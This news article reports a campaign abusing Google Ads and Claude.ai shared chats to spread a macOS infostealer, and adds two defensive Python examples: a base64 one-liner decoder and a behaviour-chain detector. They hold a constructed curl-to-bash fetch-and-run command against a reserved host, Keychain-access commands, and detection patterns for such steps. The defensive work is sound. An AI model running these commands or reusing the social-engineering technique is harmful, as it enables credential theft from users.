Hackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware
Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, with BleepingComputer independently confirming a second active version using different infrastructure.
Users searching for "Claude mac download" may see sponsored Google search results whose displayed destination is claude.ai, so the URL looks legitimate. The links lead to publicly shared Claude chats posing as official "Claude Code on Mac" installation guides, supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which silently downloads and executes malware.
At the time of reporting, two separate Claude shared chats involved in this attack were accessible publicly, each using different domains and payloads but sharing an identical social engineering approach.
How the Claude.ai Malvertising Attack Works
The pasted command uses base64 encoding to hide what it does: it downloads a shell script from attacker-controlled domains. One version, flagged by BleepingComputer, fetches a script called loader.sh from bernasibutuwqu2[.]com, while another, identified by Albayrak, uses customroofingcontractors[.]com.
The loader is never written to disk; it runs entirely in memory, leaving few artifacts for disk-based forensics. The server also delivers a differently obfuscated copy of the payload on every request (server-side polymorphism), so hash- and signature-based detection is far less effective; what remains is detecting the behaviour.
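The practical defence against a pasted one-liner is to read it before running it, which means peeling off the base64 layer first. The following is an added example, not code from the article, from BleepingComputer or from Albayrak: it unwraps any base64 tokens in a command (recursively, in case a layer decodes to another encoded layer), then matches indicators such as a fetch piped into a shell or an osascript call across every layer. The sample command is constructed; example.invalid is an RFC 2606 reserved name, not a campaign domain.

```python
# Added example (not code from the article, BleepingComputer or Albayrak):
# decode and triage a pasted Terminal one-liner before anything is executed.
# The sample command is constructed; example.invalid is a reserved name
# (RFC 2606), not a real campaign domain.
import base64
import binascii
import re
from typing import Optional

# Runs of base64 alphabet long enough to be a hidden command rather than a word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Behaviours that should stop a user from running a pasted command blindly.
# Both base64 -d (GNU, newer macOS) and -D (older BSD base64 on macOS) are covered.
INDICATORS = {
    "fetch_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|;\n]*\|\s*(ba|z)?sh\b"),
    "osascript": re.compile(r"\bosascript\b"),
    "nested_base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "eval_of_data": re.compile(r"\beval\b"),
    "writes_to_tmp": re.compile(r"/(private/)?tmp/"),
}


def _looks_like_text(raw: bytes) -> Optional[str]:
    """Return decoded text if the bytes are printable UTF-8, else None."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c.isspace() for c in text) else None


def decode_layers(cmd: str, max_depth: int = 5) -> list:
    """Peel base64 layers off a command, returning [original, layer1, ...]."""
    layers = [cmd]
    current = cmd
    for _ in range(max_depth):
        decoded = []
        for token in B64_TOKEN.findall(current):
            try:
                raw = base64.b64decode(token, validate=True)
            except binascii.Error:  # bad padding or not really base64 (e.g. a long hostname)
                continue
            text = _looks_like_text(raw)
            if text:
                decoded.append(text)
        if not decoded:
            break
        current = "\n".join(decoded)
        layers.append(current)
    return layers


def triage(cmd: str) -> dict:
    """Decode every layer, match indicators across all of them, return a verdict."""
    layers = decode_layers(cmd)
    hits = {name for layer in layers for name, pat in INDICATORS.items() if pat.search(layer)}
    blocking = {"fetch_piped_to_shell", "osascript", "eval_of_data"}
    verdict = "do_not_run" if hits & blocking else "review"
    return {"layers": layers, "indicators": sorted(hits), "verdict": verdict}


# Constructed sample: a fetch-and-run command hidden behind one base64 layer,
# mirroring the article's description of a pasted, encoded one-liner.
SAMPLE_INNER = "curl -fsSL https://example.invalid/loader.sh | bash"
SAMPLE_CMD = f"echo {base64.b64encode(SAMPLE_INNER.encode()).decode()} | base64 -D | bash"

if __name__ == "__main__":
    result = triage(SAMPLE_CMD)
    for i, layer in enumerate(result["layers"]):
        print(f"layer {i}: {layer}")
    print("indicators:", result["indicators"])
    print("verdict:", result["verdict"])
```

The verdict is deliberately conservative: a command that only decodes base64 or touches /tmp is flagged for review, while anything that pipes remote content into a shell or invokes osascript is refused outright. Note that the outer command carries no network indicator at all; only the decoded layer reveals the curl-to-bash pipeline, which is exactly why decoding before matching matters.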
In the variant flagged by BleepingComputer, the script profiles the victim before fetching the main payload:
- It checks whether the machine has a Russian or other CIS-region keyboard input source configured. If so, the script exits and sends a cis_blocked status ping to the attacker's server, a common way for crimeware to avoid infecting victims in its operators' home region.
- It also gathers the external IP address, hostname, macOS version, and keyboard locale and transmits them to the attacker.
- It then downloads a second-stage payload and runs it through osascript, the macOS command-line runner for AppleScript and JavaScript for Automation. This lets the attacker execute remote code without dropping a conventional Mach-O binary.
The variant flagged by Albayrak skips the profiling step and proceeds directly to execution. It harvests browser credentials, cookies, and the contents of the macOS Keychain, then exfiltrates the data to the attacker's server. Albayrak attributed this variant to the MacSync macOS information-stealer family.
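Because each delivered payload is obfuscated differently, a detection that keys on the chain of behaviours above (a base64 one-liner decoded into a shell, a remote script fetch, locale and host reconnaissance, osascript execution, Keychain access) holds up where a file hash or byte signature does not. The following is an added example of such a rule over process-execution telemetry; it is not code from the article or from either researcher. The events are constructed, example.invalid is a reserved name, and the specific commands assumed for input-source enumeration (defaults read ... AppleEnabledInputSources) and Keychain access (the security CLI) are illustrative guesses: the article does not say how either variant implements those steps.

```python
# Added example (not from the article or the researchers): behaviour-chain
# detection over process-execution telemetry, the kind of rule that still works
# when every delivered payload is obfuscated differently. The events below are
# constructed; example.invalid is a reserved name (RFC 2606). The commands used
# for input-source enumeration and Keychain access are assumptions for
# illustration; the article does not say how either variant performs them.
from collections import defaultdict
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcEvent:
    ts: float    # seconds since the start of the sample
    pid: int
    ppid: int
    cmd: str     # full command line as an EDR/Endpoint Security sensor records it


# One rule per stage of the chain the article describes. None depends on
# payload bytes, hashes or the attacker's current domain.
RULES = {
    "b64_decode_to_shell": re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "remote_script_fetch": re.compile(r"\b(curl|wget)\b.*https?://\S+\.sh\b"),
    "input_source_enum": re.compile(r"\bdefaults\s+read\s+\S*HIToolbox\s+AppleEnabledInputSources\b"),
    "osascript_exec": re.compile(r"^osascript\b"),
    "keychain_cli_access": re.compile(r"^security\s+(find-generic-password|find-internet-password|dump-keychain)\b"),
}


def detect(events, window_s: float = 120.0, min_rules: int = 3) -> list:
    """Alert when >= min_rules distinct stages fire in one process tree within window_s."""
    parent = {e.pid: e.ppid for e in events}
    cmd_of = {e.pid: e.cmd for e in events}

    def root(pid: int) -> int:
        # Climb while the parent is a process we also have an event for;
        # stop at the top of the recorded tree (e.g. Terminal, whose parent is launchd).
        while parent.get(pid) in parent:
            pid = parent[pid]
        return pid

    hits = defaultdict(list)            # root pid -> [(ts, rule, pid)]
    for e in events:
        for name, pat in RULES.items():
            if pat.search(e.cmd):
                hits[root(e.pid)].append((e.ts, name, e.pid))

    alerts = []
    for root_pid, tree_hits in hits.items():
        tree_hits.sort()
        for t0, _, _ in tree_hits:
            rules = {name for ts, name, _ in tree_hits if t0 <= ts <= t0 + window_s}
            if len(rules) >= min_rules:
                alerts.append({"root_pid": root_pid, "root_cmd": cmd_of[root_pid],
                               "first_ts": t0, "rules": sorted(rules)})
                break
    return alerts


TERMINAL = "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"

# Constructed telemetry for the chain in the article: pasted encoded one-liner,
# in-memory loader, profiling, osascript stage two, Keychain access.
SAMPLE_EVENTS = [
    ProcEvent(0.0, 500, 1, TERMINAL),
    ProcEvent(1.0, 501, 500, "bash -c 'echo <base64 blob> | base64 -D | bash'"),
    ProcEvent(1.2, 502, 501, "curl -fsSL https://example.invalid/loader.sh"),
    ProcEvent(1.2, 503, 501, "bash"),                       # loader read from stdin, never on disk
    ProcEvent(2.0, 504, 503, "defaults read com.apple.HIToolbox AppleEnabledInputSources"),
    ProcEvent(2.1, 505, 503, "sw_vers -productVersion"),
    ProcEvent(2.3, 506, 503, "curl -s https://example.invalid/api/ping?status=profiled"),
    ProcEvent(4.0, 507, 503, "osascript -e 'do shell script \"echo stage2\"'"),
    ProcEvent(4.5, 508, 507, "security find-generic-password -ga victim"),
]

# Constructed benign tree: a developer fetching an installer script to a file.
BENIGN_EVENTS = [
    ProcEvent(0.0, 600, 1, TERMINAL),
    ProcEvent(1.0, 601, 600, "-zsh"),
    ProcEvent(2.0, 602, 601, "git status"),
    ProcEvent(3.0, 603, 601, "curl -fsSL https://example.invalid/install.sh -o install.sh"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT", alert)
    print("benign alerts:", detect(BENIGN_EVENTS))
```

The threshold is the point: a single curl of a .sh file fires one rule and produces nothing, because that is how many legitimate installers are fetched. The alert requires several stages of the chain inside one Terminal-rooted process tree within a short window, which is what distinguishes this campaign's behaviour from ordinary developer activity, regardless of which domain or obfuscation the loader uses on a given day.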
Why This Claude.ai Malware Campaign Is Harder to Detect
Most malvertising campaigns rely on lookalike domains that imitate the real product's website. Here the malicious instructions are hosted on the legitimate claude.ai domain, inside Claude's own shared-chat feature, which publishes user-written conversations under that domain.
There is no fake URL to flag, and the destination shown in the Google ad is genuine, so domain-reputation blocking does not help; the deception lives in the page content. A similar campaign abusing ChatGPT and Grok shared chats was reported in December.
How to Avoid Fake Claude Installation Malware
Avoid sponsored search results when looking for software downloads; type claude.ai directly into the address bar instead. Treat any instruction to paste a Terminal command with suspicion, whatever the source, and read the command (decoding any base64 in it) before running it.
The legitimate Claude Code CLI is installed by following Anthropic's official documentation and does not require pasting commands from a chat interface.
If a shared Claude chat tells you to run Terminal commands on behalf of "support", treat it as malicious: a shared chat is user-generated content, not an Anthropic or Apple support page.
BleepingComputer contacted Anthropic and Google for comment before publishing. Neither company has issued a public statement regarding the misuse of shared chats and ad placements at this time.
The post Hackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware appeared first on gHacks.